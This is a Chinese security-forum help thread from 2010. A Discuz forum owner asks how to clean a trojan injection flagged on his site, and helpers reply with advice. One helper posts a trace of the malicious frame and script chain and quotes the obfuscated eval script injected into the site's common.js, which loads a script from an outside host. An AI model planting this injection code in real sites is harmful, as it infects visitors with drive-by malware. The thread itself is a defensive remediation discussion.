瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 瑞星云安全网站联盟专版 » 网站被挂马求助
名天是命运 - 2010-1-26 13:21:00
网页:http://www.dmsy520.com/bbs/viewthread.php?tid=3491
检测时间:2010-1-20 16:34:030
木马网址:
http://bbs.xcdx169.net/uc/data/logs
shellcode溢出攻击
解决方案



网页:http://www.dmsy520.com/bbs/viewthread.php?tid=3421
检测时间:2010-1-20 10:27:15
木马网址:
http://bbs.xcdx169.net/uc/data/logs
shellcode溢出攻击
解决方案



网页:http://www.dmsy520.com/bbs/redirect.php?fid=39&;tid=2071&got
检测时间:2010-1-18 10:31:24
木马网址:
http://bbs.xcdx169.net/diss/dcms/ca
shellcode溢出攻击
解决方案



网页:http://www.dmsy520.com/bbs/viewthread.php?tid=1124
检测时间:2010-1-18 9:39:15
木马网址:
http://bbs.xcdx169.net/diss/dcms/ca
shellcode溢出攻击
解决方案



网页:http://www.dmsy520.com/bbs/viewthread.php?tid=3421
检测时间:2010-1-19 10:26:15
木马网址:
http://bbs.xcdx169.net/uc/data/logs
shellcode溢出攻击
解决方案
这个要怎么解决,求助哪= =

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
networkedition - 2010-1-26 13:25:00
指定的主题不存在或已被删除或正在被审核,请返回。

[ 点击这里返回上一页 ]
名天是命运 - 2010-1-26 17:51:00
网页:http://www.dmsy520.com/bbs/
检测时间:2010-1-18 0:20:530
木马网址:

http://bbs.xcdx169.net/diss/dcms/ca
首页也有一个,我不可能把首页删除掉的
networkedition - 2010-1-27 9:00:00
论坛是被挂马了,你为啥删除被挂页面呢,删除了咋分析呢:kaka2:
Log is generated by FreShow.
[wide]http://www.dmsy520.com/bbs/
    [script]http://www.dmsy520.com/bbs/forumdata/cache/common.js?cfT
        [object]http://bbs.xcdx169.net/include/log.js?IXYBUB
            [frame]http://game.hsw.cn/plus/task/log.htm?127
                [frame]http://game.hsw.cn/plus/task/yt.htm
                    [script]http://game.hsw.cn/plus/task/nop.jpg
                    [script]http://game.hsw.cn/plus/task/ml.jpg
                    [script]http://game.hsw.cn/plus/task/rl.jpg
                        [object]http://game.hsw.cn/plus/task/log.css
                    [script]http://game.hsw.cn/plus/task/kl.jpg
                [frame]http://game.hsw.cn/plus/task/ytu.htm
                    [frame]http://game.hsw.cn/plus/task/of.htm
                        [script]http://game.hsw.cn/plus/task/rl.jpg
                            [object]http://game.hsw.cn/plus/task/log.css
                        [script]http://game.hsw.cn/plus/task/nop.jpg
                        [script]http://game.hsw.cn/plus/task/fq.jpg
    [script]http://www.dmsy520.com/bbs/plugins/ducexhome/js/xhomebox.js?cfT
    [script]http://www.dmsy520.com/bbs/plugins/ducexhome/js/dicta.js?cfT
    [script]http://www.dmsy520.com/bbs/plugins/ducexhome/js/flash.js
    [script]http://s175.cnzz.com/stat.php?id=1802571&web_id=1802571
networkedition - 2010-1-27 9:01:00
被挂链接地址:http://www.dmsy520.com/bbs/forumdata/cache/common.js?cfT
所挂内容:

[复制到剪贴板]
CODE:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|IXYBUB|log|include|net|bbs'.split('|'),0,{}));}


networkedition - 2010-1-27 9:03:00
Discuz论坛建议尽快更新补丁,前段时间Discuz论坛被爆有0day漏洞,官方已公布补丁。
名天是命运 - 2010-1-27 12:49:00
因为本人对处理挂马不太了解,以为把贴子删除了挂马就没了,现在火狐都报恶意网站了,不知道怎么弄了= =
networkedition - 2010-1-27 13:03:00
5楼不都给你列出来了嘛,按照那个去找,找到后把恶意代码删除。:kaka6:
名天是命运 - 2010-1-28 13:03:00
http://www.dmsy520.com/bbs/thread-3795-1-1.html这个页面瑞星提示挂马了,那个代码删除掉没用还是有= =
networkedition - 2010-1-28 13:20:00
瑞星病毒库版本:22.32.03.03 未做任何拦截。
名天是命运 - 2010-1-28 13:23:00
为什么那段代码会一直被加上去,昨天刚删除今天又被加上去了,那个文件在缓存文件夹里= =
networkedition - 2010-1-28 13:29:00
你更新补丁了嘛,不是让你更新补丁嘛。网站有漏洞肯定还是会被挂马呀:kaka6:
名天是命运 - 2010-1-28 17:13:00
更新了
oasisfl - 2010-2-2 14:25:00
请用DZ后台的文件效验功能检查近期所有被修改的文件,尤其不要忽略所有js文件和admincp.php
1
查看完整版本: 网站被挂马求助
© 2000 - 2025 Rising Corp. Ltd.